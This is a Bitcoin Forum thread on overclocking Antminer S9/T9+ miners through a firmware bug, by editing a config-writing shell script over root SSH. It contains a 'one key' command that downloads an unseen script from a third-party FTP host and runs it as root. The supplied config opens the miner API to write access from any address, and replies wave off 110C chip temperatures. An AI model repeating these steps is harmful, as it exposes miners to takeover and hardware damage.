Bitcoin Forum
September 24, 2018, 02:39:44 PM *
News: ♦♦ New info! Bitcoin Core users absolutely must upgrade to previously-announced 0.16.3 [Torrent]. All Bitcoin users should temporarily trust confirmations slightly less. More info.
 
   Home   Help Search Donate Login Register  
Pages: [1] 2 »  All
  Print  
Author Topic: How To Overclock Your S9/T9+,T9,R4 To 18TH/s Free.  (Read 1028 times)
sklayer
Newbie
*
Offline Offline

Activity: 4
Merit: 1


View Profile
June 06, 2018, 02:09:42 AM
Merited by tim-bc (1)
 #1

How to overclock your miner.
first, you need using SSH login your miner.

Port is 22 ,IP is your miner IP. Username is :Root, Password is :admin(not incloud space)
It using an antminer BMminer Bug. if u enable 'Fix Freq' Switch and set Freq to 1 ,Then your miner will runs at 850Freq,
S9 can be 17 - 18.5 TH/s hashrate.(PS:miner PSU must more than 2300Watt)
T9+ can be 14
5-15.5 TH/s hashrate (needs 2300W)

How to edit?
First,login your miner SSH.then edit /www/pages/cgi-bin/set_miner_conf.cgi
Edit line 96 to 135(Style like this..),and replace to these:

Code:
echo "{"                                                                        >  /config/bmminer.conf
echo "\"pools\" : ["                                                            >> /config/bmminer.conf
echo "{"                                                                        >> /config/bmminer.conf
echo "\"url\" : \"${ant_pool1url}\","                                           >> /config/bmminer.conf
echo "\"user\" : \"${ant_pool1user}\","                                         >> /config/bmminer.conf
echo "\"pass\" : \"${ant_pool1pw}\""                                            >> /config/bmminer.conf
echo "},"                                                                       >> /config/bmminer.conf
echo "{"                                                                        >> /config/bmminer.conf
echo "\"url\" : \"${ant_pool2url}\","                                           >> /config/bmminer.conf
echo "\"user\" : \"${ant_pool2user}\","                                         >> /config/bmminer.conf
echo "\"pass\" : \"${ant_pool2pw}\""                                            >> /config/bmminer.conf
echo "},"                                                                       >> /config/bmminer.conf
echo "{"                                                                        >> /config/bmminer.conf
echo "\"url\" : \"${ant_pool3url}\","                                           >> /config/bmminer.conf
echo "\"user\" : \"${ant_pool3user}\","                                         >> /config/bmminer.conf
echo "\"pass\" : \"${ant_pool3pw}\""                                            >> /config/bmminer.conf
echo "}"                                                                        >> /config/bmminer.conf
echo "]"                                                                        >> /config/bmminer.conf
echo ","                                                                        >> /config/bmminer.conf
echo "\"api-listen\" : "true","                                                 >> /config/bmminer.conf
echo "\"api-network\" : "true","                                                >> /config/bmminer.conf
echo "\"api-groups\" : \"A:stats:pools:devs:summary:version\","                 >> /config/bmminer.conf
echo "\"api-allow\" : \"A:0/0,W:*\","                                           >> /config/bmminer.conf
if [ "${ant_nobeeper}" = "true" ]; then
        echo "\"bitmain-nobeeper\" : "true","                                   >> /config/bmminer.conf
fi
if [ "${ant_notempoverctrl}" = "true" ]; then
        echo "\"bitmain-notempoverctrl\" : "true","                             >> /config/bmminer.conf
fi

echo "\"bitmain-fan-ctrl\" : "true","                                           >> /config/bmminer.conf
echo "\"bitmain-fan-pwm\" : \"100\","    >> /config/bmminer.conf
echo "\"fixed-freq\" : "true","                            >> /config/bmminer.conf
echo "\"bitmain-freq\" : \"1\","                              >> /config/bmminer.conf
echo "\"bitmain-voltage\" : \"200\","                                >> /config/bmminer.conf
echo "\"multi-version\" : \"1\""                                                >> /config/bmminer.conf
echo "}"                                                                >> /config/bmminer.conf

If you don't likes edit so more.
just using my 1 key Script:

Code:
cd /
wget ftp://html.hashthing.miner.ink:43231/9serial.sh
chmod 777 /9serial.sh
sh 9serial.sh

Edit after, login to your miner web.
save your ""Miner Configuration"" ,and Save&Apply
Enjoy Your HighHashrate!!

If you success, Please donate me some coins.
Donate Me BCH:1P3hYkpcGLrWhnP7SxpHag9mtqmg9FF4Rg (Thanks..)
Donate Me BTC:16TwadK7mBvYYkhhC7HJa3qfxbTUzogyE6 (Thanks.)

If you need Customize Your miner Hashrate or watt, You can send mail to us :nvid@vip.qq.com

We tested S9 13T  --> 17.5T
S9 14T --> 18.5T
T9 --> 16T
T9+ --> 15.5T
R4 (didn't test)
Make a difference with your Ether.
Donate Ether for the greater good.
SPRING.WETRUST.IO
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction. Advertise here.
1537799984
Hero Member
*
Offline Offline

Posts: 1537799984

View Profile Personal Message (Offline)

Ignore
1537799984
Reply with quote  #2

1537799984
Report to moderator
1537799984
Hero Member
*
Offline Offline

Posts: 1537799984

View Profile Personal Message (Offline)

Ignore
1537799984
Reply with quote  #2

1537799984
Report to moderator
mindtrip
Legendary
*
Offline Offline

Activity: 1127
Merit: 1005



View Profile WWW
June 06, 2018, 03:01:04 PM
 #2

can this be modified so you can pick the frequency that works best on your particular miner or using a lower watt PSU? for exa,ple instead of 17TH at 2,300 watts can this be clocked lower to run say 15TH at a lower power draw so it can run on an 1,800 Watt PSU?
sklayer
Newbie
*
Offline Offline

Activity: 4
Merit: 1


View Profile
June 06, 2018, 11:14:45 PM
 #3

can this be modified so you can pick the frequency that works best on your particular miner or using a lower watt PSU? for exa,ple instead of 17TH at 2,300 watts can this be clocked lower to run say 15TH at a lower power draw so it can run on an 1,800 Watt PSU?

it needs compile binary files.. i can do it. but it is so diffculty...
Vene
Member
**
Offline Offline

Activity: 133
Merit: 11


View Profile
June 09, 2018, 08:44:27 AM
 #4

Cool but to me looks like it should be from line 96-135
Here is my code from 96-135. Am I right?

Code:
echo "{"                                                                        >  /config/bmminer.conf
echo "\"pools\" : ["                                                            >> /config/bmminer.conf
echo "{"                                                                        >> /config/bmminer.conf
echo "\"url\" : \"${ant_pool1url}\","                                           >> /config/bmminer.conf
echo "\"user\" : \"${ant_pool1user}\","                                         >> /config/bmminer.conf
echo "\"pass\" : \"${ant_pool1pw}\""                                            >> /config/bmminer.conf
echo "},"                                                                       >> /config/bmminer.conf
echo "{"                                                                        >> /config/bmminer.conf
echo "\"url\" : \"${ant_pool2url}\","                                           >> /config/bmminer.conf
echo "\"user\" : \"${ant_pool2user}\","                                         >> /config/bmminer.conf
echo "\"pass\" : \"${ant_pool2pw}\""                                            >> /config/bmminer.conf
echo "},"                                                                       >> /config/bmminer.conf
echo "{"                                                                        >> /config/bmminer.conf
echo "\"url\" : \"${ant_pool3url}\","                                           >> /config/bmminer.conf
echo "\"user\" : \"${ant_pool3user}\","                                         >> /config/bmminer.conf
echo "\"pass\" : \"${ant_pool3pw}\""                                            >> /config/bmminer.conf
echo "}"                                                                        >> /config/bmminer.conf
echo "]"                                                                        >> /config/bmminer.conf
echo ","                                                                        >> /config/bmminer.conf
echo "\"api-listen\" : "true","                                                 >> /config/bmminer.conf
echo "\"api-network\" : "true","                                                >> /config/bmminer.conf
echo "\"api-groups\" : \"A:stats:pools:devs:summary:version\","                          >> /config/bmminer.conf
echo "\"api-allow\" : \"A:0/0,W:*\","                       >> /config/bmminer.conf
if [ "${ant_nobeeper}" = "true" ]; then
        echo "\"bitmain-nobeeper\" : "true","                                   >> /config/bmminer.conf
fi
if [ "${ant_notempoverctrl}" = "true" ]; then
        echo "\"bitmain-notempoverctrl\" : "true","                             >> /config/bmminer.conf
fi

if [ "${ant_fan_customize_switch}" = "true" ]; then
        echo "\"bitmain-fan-ctrl\" : "true","                           >> /config/bmminer.conf
        echo "\"bitmain-fan-pwm\" : \"${ant_fan_customize_value}\","    >> /config/bmminer.conf

fi
echo "\"bitmain-use-vil\" : "true","                            >> /config/bmminer.conf
echo "\"bitmain-freq\" : \"${ant_freq}\","                              >> /config/bmminer.conf
echo "\"bitmain-voltage\" : \"${ant_voltage}\","                                >> /config/bmminer.conf
echo "\"multi-version\" : \"1\""                                                >> /config/bmminer.conf
echo "}"
sklayer
Newbie
*
Offline Offline

Activity: 4
Merit: 1


View Profile
June 10, 2018, 07:06:49 AM
 #5

Thankyou i will edit
digital$
Member
**
Offline Offline

Activity: 182
Merit: 10


View Profile
June 11, 2018, 02:30:17 PM
 #6

Hi guys...ive ssh into antminer T9+ .....what command in "putty" do i need to access config file?  complete noob in doing this so any help appreciated : )
taserz
Full Member
***
Offline Offline

Activity: 425
Merit: 108


Mining since 2011


View Profile
June 11, 2018, 09:50:45 PM
 #7

Thankyou i will edit

Can you make it do the same but for 1600w aka the max the bitmain psu does for the s9?

Want to throw me a tip: 1E5bZiPAh7Yt1VqNUyk7y9r48zpbGNTEUA
Mining bitcoin since 2011.
Best nerd decision of my life.
BitMaxz
Legendary
*
Offline Offline

Activity: 1190
Merit: 1032

Bitmain miners is getting worst.


View Profile WWW
June 11, 2018, 11:46:59 PM
 #8

Is it real? About this (S9 can be 17 - 17 TH/s hashrate.(PS:miner PSU must more than 2300Watt)) if I follow your method it could increase the hashing rate to 17 TH/s?
Let me ask if it is safe for s9 if I change the config and set freq. it to 1?
Could you share me your temps of hashing board while mining with 17TH/s?

Vene
Member
**
Offline Offline

Activity: 133
Merit: 11


View Profile
June 12, 2018, 01:25:07 PM
 #9

Hi guys...ive ssh into antminer T9+ .....what command in "putty" do i need to access config file?  complete noob in doing this so any help appreciated : )

vi /www/pages/cgi-bin/set_miner_conf.cgi
digital$
Member
**
Offline Offline

Activity: 182
Merit: 10


View Profile
June 13, 2018, 07:47:43 AM
 #10

Hi guys...ive ssh into antminer T9+ .....what command in "putty" do i need to access config file?  complete noob in doing this so any help appreciated : )

vi /www/pages/cgi-bin/set_miner_conf.cgi

thanks!!
digital$
Member
**
Offline Offline

Activity: 182
Merit: 10


View Profile
June 19, 2018, 03:55:50 AM
 #11

thanks for sharing this sklayer, big respect brother...tried it on my T9+ and it works great! 
dutchlincoln
Member
**
Offline Offline

Activity: 210
Merit: 25


View Profile
June 20, 2018, 09:24:05 AM
 #12

sooooo, i have a S9 with one broken board (nothing to see, just wond come up anymore). Suppose when i do this, i'll upgrade it to its almost original with 12Th instead of 13.5
Now, since i miss one board, can i say the power draw is 1600 watts then? (2/3rd of 23000

That would be great, as the bitmain is 1600W... Smiley
digital$
Member
**
Offline Offline

Activity: 182
Merit: 10


View Profile
June 20, 2018, 01:37:45 PM
 #13

update on running the script skylaker provided on T9+...set my freq using awesome miner through the API access to 675mhz...getting stable 12.2TH chip temps @77-78.  running on APW 1600 power supply ex bitmain
fanatic26_
Member
**
Offline Offline

Activity: 98
Merit: 15


View Profile
July 30, 2018, 09:04:18 PM
Merited by Philopolymath (2)
 #14

Do you mind elaborating more on how to do it? I have a bunch of T9+ which are not being profitable

You guys realize that the added power draw from these overclocks negate any possible profit right?

That and you will blow your equipment up much faster.

Pushing the hardware like this is a recipe for disaster and a pretty dumb thing to do if you care about making money.
tim-bc
Member
**
Offline Offline

Activity: 168
Merit: 21


View Profile
August 25, 2018, 01:11:46 PM
 #15

can this be modified so you can pick the frequency that works best on your particular miner or using a lower watt PSU? for exa,ple instead of 17TH at 2,300 watts can this be clocked lower to run say 15TH at a lower power draw so it can run on an 1,800 Watt PSU?

In bmminer-mix you have to define BMMINER_VERSION to a fixed frequency option and upload the new bmminer.sh. After that, you can use minerAdvanced.cgi to set the frequency to anything you like.

Ignore scammers on Skype, Telegram, etc. I will only ever contact you via forum PMs. See profile for fingerprint.
OddEvenBets.com
Full Member
***
Offline Offline

Activity: 434
Merit: 100



View Profile WWW
September 11, 2018, 04:02:34 PM
 #16

Code:
echo "\"bitmain-fan-ctrl\" : "true","                                           >> /config/bmminer.conf
echo "\"bitmain-fan-pwm\" : \"100\","    >> /config/bmminer.conf
echo "\"fixed-freq\" : "true","                            >> /config/bmminer.conf
echo "\"bitmain-freq\" : \"1\","                              >> /config/bmminer.conf
echo "\"bitmain-voltage\" : \"200\","                                >> /config/bmminer.conf
echo "\"multi-version\" : \"1\""                                                >> /config/bmminer.conf

I want make RPM fan lower.. because 6320 RPM is very high..

How can make it?

I'm interested what mean these variables..
"bitmain-fan-ctrl\"                  
"bitmain-fan-pwm\"
"fixed-freq\" : "true","                          
"bitmain-freq\" : \"1\","                              
"bitmain-voltage\" : \"200\","      

What happen if I set "bitmain-fan-ctrl\":"false"  ?

and "bitmain-fan-pwm\" : "50"

tim-bc
Member
**
Offline Offline

Activity: 168
Merit: 21


View Profile
September 12, 2018, 09:06:27 PM
 #17

I want make RPM fan lower.. because 6320 RPM is very high..

How can make it?

Just change bitmain-fan-pwm to something lower, like 50 or 60%.

Ignore scammers on Skype, Telegram, etc. I will only ever contact you via forum PMs. See profile for fingerprint.
eliv3n
Newbie
*
Offline Offline

Activity: 7
Merit: 0


View Profile
September 15, 2018, 01:58:38 PM
 #18

after overclocking T9+ with full fan RPM, I am getting 15.5TH with 2300W PSU.
BUT the tempruture goes to 110 degree. are you running your T9+ on 110 degree? is it safe? I don't want to burn the hashboard.  Cry

please advice.  Huh Huh Huh
dutchlincoln
Member
**
Offline Offline

Activity: 210
Merit: 25


View Profile
September 17, 2018, 06:04:35 PM
 #19

in hot summer if my S9's came above 100 degrees, i rebooted and stopped them. 110 is suicide...
tim-bc
Member
**
Offline Offline

Activity: 168
Merit: 21


View Profile
September 18, 2018, 12:51:15 AM
 #20

after overclocking T9+ with full fan RPM, I am getting 15.5TH with 2300W PSU.
BUT the tempruture goes to 110 degree. are you running your T9+ on 110 degree? is it safe? I don't want to burn the hashboard.  Cry

please advice.  Huh Huh Huh

I am running a T9+ with two boards at 850 MHz, peaking around 109C. It's been stable at that temp for weeks. I had disabled the temperature protection earlier and melted one of the chips in the low 120C range. So 110C should be fine.

Ignore scammers on Skype, Telegram, etc. I will only ever contact you via forum PMs. See profile for fingerprint.
Pages: [1] 2 »  All
  Print  
 
Jump to:  

Sponsored by , a Bitcoin-accepting VPN.
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!